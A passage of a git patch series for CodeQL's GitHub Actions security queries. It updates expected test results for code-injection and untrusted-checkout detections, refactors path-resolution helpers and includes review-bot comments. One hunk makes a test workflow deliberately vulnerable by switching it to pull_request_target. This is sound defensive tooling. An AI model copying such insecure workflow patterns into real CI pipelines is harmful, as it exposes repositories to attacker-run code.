| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 26d4741a469..75b64cea3e5 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -70,8 +70,8 @@ edges | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -287,8 +287,8 @@ nodes | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -414,10 +414,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml index 1e7558b3bc0..560475dc938 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml @@ -1,7 +1,7 @@ name: assets-test on: - pull_request: + pull_request_target: jobs: check-execution-context: diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 4fbfca24126..13637396f90 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -255,7 +255,6 @@ edges | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | 
@@ -273,7 +272,6 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 181bd5673bc..81a8c63c882 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected 
@@ -1,7 +1,3 @@ -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index eb9fcc2418a..29237c9a544 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 
@@ -4,9 +4,15 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. 
| | .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From abd49d5b110a37fcf311586179b0553790eee87f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 12:12:29 +0200 Subject: [PATCH 0526/1267] Improve privilege workflow detection --- ql/lib/codeql/actions/Helper.qll | 16 ---------------- 1 file changed, 16 deletions(-) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index f6c31a6e8ea..9ac67575b8b 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -252,26 +252,10 @@ predicate inPrivilegedExternallyTriggerableJob(AstNode node) { ) } -predicate calledByPrivilegedExternallyTriggerableJob(AstNode node) { - exists(ReusableWorkflow rw, ExternalJob caller, Job callee | - callee = node.getEnclosingJob() and - rw.getACaller() = caller and - rw.getAJob() = callee and - caller.isPrivilegedExternallyTriggerable() - ) - or - exists(LocalJob caller | - caller = node.getEnclosingCompositeAction().getACallerJob() and - caller.isPrivilegedExternallyTriggerable() - ) -} - predicate inPrivilegedContext(AstNode node) { inPrivilegedCompositeAction(node) or inPrivilegedExternallyTriggerableJob(node) - or - calledByPrivilegedExternallyTriggerableJob(node) } predicate inNonPrivilegedCompositeAction(AstNode node) { From 090d22fa7a870430a226ac8faddd210d6f59cab1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:38:42 +0200 Subject: [PATCH 0527/1267] Add GetRepoRoot helper function --- ql/lib/codeql/actions/Helper.qll | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 9ac67575b8b..0df7b125019 100644 --- a/ql/lib/codeql/actions/Helper.qll 
+++ b/ql/lib/codeql/actions/Helper.qll @@ -298,3 +298,20 @@ string defaultBranchNames() { not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and result = ["main", "master"] } + +string getRepoRoot() { + exists(Workflow w | + w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + result = + w.getLocation() + .getFile() + .getRelativePath() + .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and + // exclude workflow_enum reusable workflows directory root + not result.indexOf(".github/reusable_workflows/") > -1 + or + not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and + result = "" + ) +} From ffbddb10732d33cc934efc1d8dd570664a61e0d2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:40:15 +0200 Subject: [PATCH 0528/1267] Simplify Callable/call match --- ql/lib/codeql/actions/ast/internal/Ast.qll | 55 +++++++++++----------- 1 file changed, 28 insertions(+), 27 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d05174f4787..d1c7718d77b 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
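Review bot: `getRepoRoot()` is added to Helper.qll without QLDoc, and its contract is not what the name suggests. It binds `result` once per `Workflow` in the database, so it yields every distinct prefix that precedes a `/.github/workflows` directory, plus `""` for workflows whose relative path has no such prefix; it does not return the root of one particular file. Because `indexOf` holds for every occurrence of the substring, a path containing `/.github/workflows` more than once would contribute more than one prefix. I would add a comment such as `/** Gets the path prefix of a directory that contains a .github/workflows folder; one result per such directory in the database, "" when workflows sit at the database root. */` so callers do not treat it as single-valued.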
@@ -308,19 +308,22 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { LocalJobImpl getACallerJob() { result = this.getACallerStep().getEnclosingJob() } UsesStepImpl getACallerStep() { - exists(UsesStepImpl caller, string gwf_path, string path | - // the workflow files may not be rooted in the parent directory of .github/workflows - // extract the offset so we can remove it from the action path - gwf_path = - caller - .getLocation() + exists(DataFlow::CallNode call | + call.getCalleeNode() = this and + result = call.getCfgNode().getAstNode() + ) + } + + string getResolvedPath() { + result = + ["", "./"] + + this.getLocation() .getFile() .getRelativePath() - .prefix(caller.getLocation().getFile().getRelativePath().indexOf(".github/workflows/")) and - path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "") and - caller.getCallee() = ["", "./"] + path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and - result = caller - ) + .replaceAll(getRepoRoot(), "") + .replaceAll("/action.yml", "") + .replaceAll("/action.yaml", "") + .replaceAll(".github/reusable_workflows/", "") } private predicate hasExplicitSecretAccess() { @@ -352,6 +355,8 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { ) } + EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } + /** Holds if the action is privileged and externally triggerable. */ predicate isPrivilegedExternallyTriggerable() { // the action is externally triggerable @@ -447,6 +452,16 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { result = call.getCfgNode().getAstNode() ) } + + string getResolvedPath() { + result = + ["", "./"] + + this.getLocation() + .getFile() + .getRelativePath() + .replaceAll(getRepoRoot(), "") + .replaceAll(".github/reusable_workflows/", "") + } } class InputsImpl extends AstNodeImpl, TInputsNode { 
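Review bot: `CompositeActionImpl.getResolvedPath()` strips its pieces with unanchored `replaceAll` calls, so `getRepoRoot()`, `/action.yml`, `/action.yaml` and `.github/reusable_workflows/` are removed wherever they occur in the relative path, not only as a leading prefix or trailing file name. The same applies to `ReusableWorkflowImpl.getResolvedPath()` in the third hunk of this file. Because `getRepoRoot()` can have several values, one file can get several resolved paths, each offered both bare and with `./` prepended. The later `viableCallable` change in DataFlowPrivate.qll resolves `uses:` targets by plain equality on this string, so a loose result here may link a call to the wrong callee and attach taint flow to the wrong action or workflow. Consider cutting with `prefix`/`suffix` at a known offset, and add QLDoc to both predicates stating which `uses:` forms they are meant to match; `CompositeActionImpl` starts before this hunk.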
@@ -1229,15 +1244,6 @@ abstract class UsesImpl extends AstNodeImpl { } } -/** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * The capture groups are: - * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` - * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. - * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. - */ -private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } - /** A Uses step represents a call to an action that is defined in a GitHub repository. */ class UsesStepImpl extends StepImpl, UsesImpl { YamlScalar u; @@ -1249,19 +1255,14 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { if u.getValue().indexOf("@") > 0 - then - result = - ( - u.getValue().regexpCapture(usesParser(), 1) + "/" + - u.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() + then result = u.getValue().prefix(u.getValue().indexOf("@")) else result = u.getValue() } override ScalarValueImpl getCalleeNode() { result.getNode() = u } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } + override string getVersion() { result = u.getValue().suffix(u.getValue().indexOf("@") + 1) } override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" From ef549ef79564ece1975a6f8df03208175f93b2e6 Mon Sep 17 00:00:00 2001 
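Review bot: The new `UsesStepImpl.getCallee()` drops the `.toLowerCase()` that the removed regexp version applied to `owner/repo`, so `Actions/Checkout@v4` and `actions/checkout@v4` now yield different callees. GitHub resolves owner and repository names case-insensitively, so any query that compares `getCallee()` with a lower-case literal would stop matching mixed-case references and silently miss a finding; those comparisons are outside this hunk, so this needs confirming. Either normalise case on both sides of the comparison or state in the QLDoc that the result is now case-preserving and includes any sub-path. Separately, `indexOf("@")` holds for every `@` in the value, so `getCallee()` and `getVersion()` become multi-valued for a reference containing more than one `@`; `u.getValue().indexOf("@", 0, 0)` pins the first occurrence. `UsesStepImpl` continues outside the hunk.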
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:41:03 +0200 Subject: [PATCH 0529/1267] Add Outputs nodes as CFG/DFG nodes --- ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 1fe4a3e7e1c..8a6e52309fb 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -148,7 +148,7 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos rank[i](AstNode child, Location l | ( child = this.(CompositeAction).getAnInput() or - child = this.(CompositeAction).getAnOutputExpr() or + child = this.(CompositeAction).getOutputs() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,7 +172,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { rank[i](AstNode child, Location l | ( child = this.(ReusableWorkflow).getAnInput() or - child = this.(ReusableWorkflow).getAnOutputExpr() or + child = this.(ReusableWorkflow).getOutputs() or child = this.(ReusableWorkflow).getStrategy() or child = this.(ReusableWorkflow).getAJob() ) and @@ -202,7 +202,7 @@ private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getOutputExpr(_) and l = child.getLocation() + child = super.getAnOutputExpr() and l = child.getLocation() | child order by From 7c2386bbeea2322424ac0064c2fd0eee7b92bcfe Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:42:52 +0200 Subject: [PATCH 0530/1267] Simplify callable/call matches --- .../dataflow/internal/DataFlowPrivate.qll | 45 ++----------------- 1 file changed, 4 insertions(+), 41 deletions(-) 
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 529bbc82087..3226e41ba2f 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -70,7 +70,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a local action, 3rd party action or a reusable workflow get called + * A call corresponds to a Uses steps where a composite action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof Uses } @@ -89,23 +89,6 @@ class DataFlowCall instanceof Cfg::Node { Location getLocation() { result = this.(Cfg::Node).getLocation() } } -string getRepoRoot() { - exists(Workflow w | - w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and - result = - w.getLocation() - .getFile() - .getRelativePath() - .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and - // exclude workflow_enum reusable workflows directory root - not result.indexOf(".github/reusable_workflows/") > -1 - or - not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and - not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and - result = "" - ) -} - /** * A Cfg scope that can be called */ 
@@ -113,22 +96,8 @@ class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } string getName() { - if this instanceof ReusableWorkflow - then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() // or - else - if this instanceof CompositeAction - then - result = - this.(CompositeAction) - .getLocation() - .getFile() - .getRelativePath() - .prefix(this.(CompositeAction) - .getLocation() - .getFile() - .getRelativePath() - .indexOf(["/action.yml", "/action.yaml"])) - else none() + result = this.(ReusableWorkflowImpl).getResolvedPath() or + result = this.(CompositeActionImpl).getResolvedPath() } /** Gets a best-effort total ordering. */ @@ -150,13 +119,7 @@ class NormalReturn extends ReturnKind, TNormalReturn { } /** Gets a viable implementation of the target of the given `Call`. */ -DataFlowCallable viableCallable(DataFlowCall c) { - c.getName() = result.getName() or - c.getName() = result.getName().replaceAll(getRepoRoot(), "") or - // special case for reusable workflows downloaded by the workflow_enum action - c.getName() = - result.getName().replaceAll(getRepoRoot(), "").replaceAll(".github/reusable_workflows/", "") -} +DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } /** * Gets a node that can read the value returned from `call` with return kind From 4fc9e3f0f1df5e091d47c200ae1b653d57a177f5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:43:10 +0200 Subject: [PATCH 0531/1267] Add Composite action's outputs as a return node --- ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git 